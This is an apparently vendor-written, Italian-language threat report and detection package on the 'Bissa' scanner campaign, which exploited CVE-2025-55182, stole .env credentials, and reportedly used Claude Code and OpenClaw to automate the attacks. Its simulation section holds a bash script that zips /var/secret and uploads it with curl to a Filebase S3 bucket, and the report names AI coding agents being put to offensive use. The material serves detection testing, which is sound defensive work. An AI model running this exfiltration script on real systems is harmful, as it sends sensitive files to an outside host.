Bissa Scanner Esposto: Sfruttamento Massimale Assistito dall’AI e Raccolta di Credenziali
Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Un server esposto ha rivelato un’operazione su larga scala che utilizzava la piattaforma di scannerizzazione Bissa, Claude Code e OpenClaw per automatizzare lo sfruttamento di obiettivi esposti a Internet tramite una vulnerabilità React2Shell (CVE-2025-55182). La campagna ha sottratto milioni di file .env contenenti credenziali di alto valore da servizi AI, cloud, pagamento e messaggistica. I dati raccolti sono stati caricati su un bucket S3 pubblico su Filebase per un uso futuro. L’operazione ha preso di mira organizzazioni nei settori finanziario, delle criptovalute e della vendita al dettaglio.
Investigazione
Gli analisti hanno recuperato oltre 13.000 file che mostrano il flusso di lavoro per la scansione, lo sfruttamento, la convalida e la prioritizzazione degli ambienti delle vittime. I log hanno confermato oltre 900 compromissioni riuscite utilizzando lo sfruttamento React2Shell. Sono stati utilizzati bot Telegram per avvisi in tempo reale, collegando ogni colpo ai dettagli delle vittime. Lo scanner conteneva anche un modulo per una vulnerabilità di WordPress W3 Total Cache (CVE-2025-9501), ma non è stata osservata alcuna exploitazione con successo.
Mitigazione
Applica rapidamente patch a applicazioni e framework vulnerabili, in particolare i componenti React2Shell e WordPress W3 Total Cache. Sposta i segreti dai file .env in gestori di segreti dedicati e ruota periodicamente le credenziali. Rinforza l’accesso ai metadati nel cloud e applica la RBAC del minimo privilegio. Monitora il traffico in uscita per rilevare upload non autorizzati a servizi di storage esterni.
Risposta
Implementare regole di rilevamento per lo sfruttamento di CVE-2025-55182 e upload S3 non autorizzati. Bloccare domini noti dannosi e comunicazioni tramite bot Telegram. Condurre analisi forense degli host compromessi per individuare e rimuovere payload residuali. Notificare immediatamente gli utenti colpiti e ruotare eventuali credenziali trapelate.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef action fill:#99ccff classDef operator fill:#ff9900 %% Nodes tool_bissa_scanner["<b>Tool</b> – <b>Nome</b>: Bissa scanner<br/><b>Scopo</b>: Esegue una scansione attiva massiva utilizzando feed di target"] class tool_bissa_scanner tool tech_T1595_002["<b>Tecnica</b> – <b>T1595.002 Scansione Attiva: Scansione di Vulnerabilità</b><br/><b>Descrizione</b>: Scansiona host esposti a Internet per trovare servizi vulnerabili"] class tech_T1595_002 technique tech_T1190["<b>Tecnica</b> – <b>T1190 Sfruttamento di Applicazioni Pubbliche</b><br/><b>Descrizione</b>: Sfrutta applicazioni web vulnerabili per ottenere accesso iniziale"] class tech_T1190 technique tool_react2shell["<b>Tool</b> – <b>Nome</b>: React2Shell (CVEu20112025u201155182)<br/><b>Funzione</b>: Fornisce esecuzione di codice remoto tramite payload React fabbricati"] class tool_react2shell tool tech_T1210["<b>Tecnica</b> – <b>T1210 Sfruttamento di Servizi Remoti</b><br/><b>Descrizione</b>: Esegue il payload su servizi remoti per ottenere l’esecuzione di codice"] class tech_T1210 technique tech_T1211["<b>Tecnica</b> – <b>T1211 Sfruttamento per Evasione dalle Difese</b><br/><b>Descrizione</b>: Utilizza vulnerabilità per bypassare le difese e rimanere nascosto"] class tech_T1211 technique tech_T1552_001["<b>Tecnica</b> – <b>T1552.001 Credenziali Non Sicure: Credenziali nei File</b><br/><b>Descrizione</b>: Ottenere credenziali archiviate in file di configurazione come .env"] class tech_T1552_001 technique tech_T1119["<b>Tecnica</b> – <b>T1119 Raccolta Automatizzata</b><br/><b>Descrizione</b>: Automatizza la convalida, la prioritizzazione e il raggruppamento dei dati raccolti per l’esfiltrazione"] class tech_T1119 technique tech_T1102_002["<b>Tecnica</b> – <b>T1102.002 Servizio Web: Comunicazione Bidirezionale</b><br/><b>Descrizione</b>: Utilizza servizi web (bot Telegram) per scambiare comandi e dati"] class tech_T1102_002 technique tool_telegram_bot["<b>Tool</b> – <b>Nome</b>: Bot Telegram @bissapwned_bot, @bissa_scan_bot<br/><b>Scopo</b>: Canale di comando e controllo"] class tool_telegram_bot tool tech_T1567_002["<b>Tecnica</b> – <b>T1567.002 Esfiltrazione Tramite Servizio Web: Esfiltrazione su Archivio Cloud</b><br/><b>Descrizione</b>: Carica archivi rubati su storage cloud tramite servizio web"] class tech_T1567_002 technique tool_filebase_bucket["<b>Tool</b> – <b>Nome</b>: Bucket compatibile con Filebase S3 (bissapromax)<br/><b>Scopo</b>: Archivia credenziali esfiltrate"] class tool_filebase_bucket tool tech_T1537["<b>Tecnica</b> – <b>T1537 Trasferimento Dati su Cloud Account</b><br/><b>Descrizione</b>: Sposta dati su un account cloud controllato dagli aggressori per recupero successivo"] class tech_T1537 technique tech_T1068["<b>Tecnica</b> – <b>T1068 Sfruttamento per Escalation di Privilegi</b><br/><b>Descrizione</b>: Utilizza credenziali ottenute per ottenere privilegi maggiori e spostamenti laterali"] class tech_T1068 technique %% Connections tool_bissa_scanner –>|esegue| tech_T1595_002 tech_T1595_002 –>|identifica servizi vulnerabili| tech_T1190 tech_T1190 –>|utilizza| tool_react2shell tool_react2shell –>|fornisce payload a| tech_T1210 tech_T1210 –>|abilita| tech_T1211 tech_T1211 –>|permette| tech_T1552_001 tech_T1552_001 –>|alimenta| tech_T1119 tech_T1119 –>|invia dati tramite| tech_T1102_002 tech_T1102_002 –>|implementato da| tool_telegram_bot tech_T1102_002 –>|esfiltra su| tech_T1567_002 tech_T1567_002 –>|archivia in| tool_filebase_bucket tool_filebase_bucket –>|abilita| tech_T1537 tech_T1537 –>|supporta| tech_T1068 "
Flusso di Attacco
Rilevamenti
Possibile Sfruttamento del CVE-2025-55182 (RCE non autenticata in React Server Components) (tramite webserver)
Visualizza
Possibile Sfruttamento del CVE-2025-55182 (RCE non autenticata in React Server Components) (tramite proxy)
Visualizza
Possibili Comunicazioni C2 su HTTP a IP Diretto con Porta Insolita (tramite proxy)
Visualizza
Esfiltrazione Dati tramite Filebase S3-Compatible [Proxy]
Visualizza
Esfiltrazione Dati tramite Filebase S3-Compatible [AWS Cloudtrail]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Precedente di Telemetria e Baseline deve essere stato superato.
-
Narrativa e Comandi d’Attacco:
L’avversario ha raccolto un insieme di documenti riservati da/var/secret/. Per evitare il rilevamento, prima archiviano i dati in un file ZIP protetto da password, poi utilizzanocurlper caricare l’archivio direttamente al punto finale Filebase S3 attraverso il proxy aziendale. Il proxy registra l’URL completo della richiesta, che corrisponde alla regola di rilevamento. -
Script di Test di Regressione:
#!/usr/bin/env bash set -euo pipefail # 1️⃣ Staging dati (T1074) STAGE_DIR="/tmp/staged_data" mkdir -p "$STAGE_DIR" cp -r /var/secret/* "$STAGE_DIR/" # 2️⃣ Archivio dati (T1560.001) – zip protetto da password ARCHIVE="/tmp/exfil_archive.zip" ZIP_PASSWORD="P@ssw0rd!" zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null # 3️⃣ Esfiltrazione tramite endpoint Filebase S3 (T1020) # Assume che il proxy sia raggiungibile a http://proxy.company.local:3128 FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip" curl -x http://proxy.company.local:3128 -T "$ARCHIVE" -H "Host: s3.filebase.com" -H "User-Agent: Mozilla/5.0" "$FILEBASE_URL" --silent --output /dev/null echo "Tentativo di esfiltrazione completato." -
Comandi di Pulizia:
# Rimuovi file messi in scena e archivio rm -rf /tmp/staged_data /tmp/exfil_archive.zip # (Opzionale) Svuota connessioni proxy se necessario # Per Squid: squid -k rotate echo "Pulizia completata."